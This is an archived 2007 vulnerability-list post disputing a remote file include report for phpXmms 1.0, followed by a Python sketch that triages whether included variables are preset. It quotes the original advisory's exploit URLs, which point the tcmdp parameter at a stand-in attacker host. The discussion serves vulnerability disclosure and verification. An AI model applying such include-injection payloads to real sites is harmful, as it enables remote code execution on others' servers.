[VIM] false: phpXmms 1.0 (tcmdp) Remote File Include Vulnerabilities
str0ke
str0ke at milw0rm.com
Tue Feb 20 14:09:20 EST 2007
The config.php file contains the below, which pretty much blocks an RFI.
<?
$nprog = "phpxmms";
$ntheme = "ultrafina"; # theme name
$alink = "#738db4"; # playlist link colour
$tcmdp = "smmxphp.php";
$ttopp = "phpxmmst.php";
$tmidp = "phpxmmsm.php";
$tbotp = "phpxmmsb.php";
$precmd = "xmms-shell -e";
$predir = "/mp3"; # mp3 directory
$tuser = "user"; # user running XMMS
$thost = "localhost"; # box running XMMS
$tlist = "/tmp/toons.m3u";
$tldir = "/tmp/toons.dir";
$tclean = "2> /dev/null";
?>
-------------------------------------------------------------------------------------------------------------------
AYYILDIZ.ORG PreSents...
Script: phpXmms 1.0
Script Download: ftp://ftp.warpedsystems.sk.ca/pub/php/phpxmms-1.0.tar.gz
Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>
Code:
include($tcmdp);
-------------------------------------------------------------------------------------------------------------------
Exploit: phpxmmsb.php?tcmdp=http://attacker.txt?
phpxmmst.php?tcmdp=http://attacker.txt?
-------------------------------------------------------------------------------------------------------------------
Tnx:H0tturk,Asianeagle,ajann,Str0ke .
Special Tnx: AYYILDIZ.ORG
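
A triage sketch for reports like this one, added here as an example and not part of the original post or of phpXmms: it walks a script in execution order and reports whether the variable passed to include() already holds a string literal at that point. The entry-script contents, `NO_CONFIG_PHP` and the `triage` helper are assumptions for illustration; the post shows only config.php and the include line.

```python
import re

# Constructed samples. Assumption: the entry script loads config.php before
# the include; the post shows only config.php and the include line itself.
CONFIG_PHP = '<?\n$nprog = "phpxmms";\n$tcmdp = "smmxphp.php";\n?>'
ENTRY_PHP = '<?\ninclude("config.php");\ninclude($tcmdp);\n?>'
NO_CONFIG_PHP = '<?\ninclude($tcmdp);\n?>'  # hypothetical variant without config

INCLUDE_RE = re.compile(r'\b(?:include|require)(?:_once)?\s*\(?\s*(.+?)\s*\)?\s*;')
ASSIGN_RE = re.compile(r'^\s*\$(\w+)\s*=\s*(["\'])[^"\'$]*\2\s*;')

def triage(source, files):
    """Return [(variable, verdict)] for every include($var) reached.

    files maps a file name to its source so literal includes can be followed.
    Line-level heuristic: branches and string concatenation are not modelled.
    """
    literal_vars = set()   # variables assigned a plain string literal so far
    findings = []

    def walk(text):
        for line in text.splitlines():
            assigned = ASSIGN_RE.match(line)
            if assigned:
                literal_vars.add(assigned.group(1))
                continue
            inc = INCLUDE_RE.search(line)
            if not inc:
                continue
            arg = inc.group(1)
            if arg[0] in '"\'':
                # include of a fixed file: follow it, it may set variables
                name = arg.strip('"\'')
                if name in files:
                    walk(files[name])
            elif arg.startswith('$'):
                var = arg[1:]
                verdict = "literal" if var in literal_vars else "uninitialized"
                findings.append((var, verdict))

    walk(source)
    return findings

if __name__ == "__main__":
    print(triage(ENTRY_PHP, {"config.php": CONFIG_PHP}))
    print(triage(NO_CONFIG_PHP, {}))
```

A "literal" verdict means a request-supplied value for that variable is overwritten before the include runs; "uninitialized" means the report deserves a closer look at the PHP configuration.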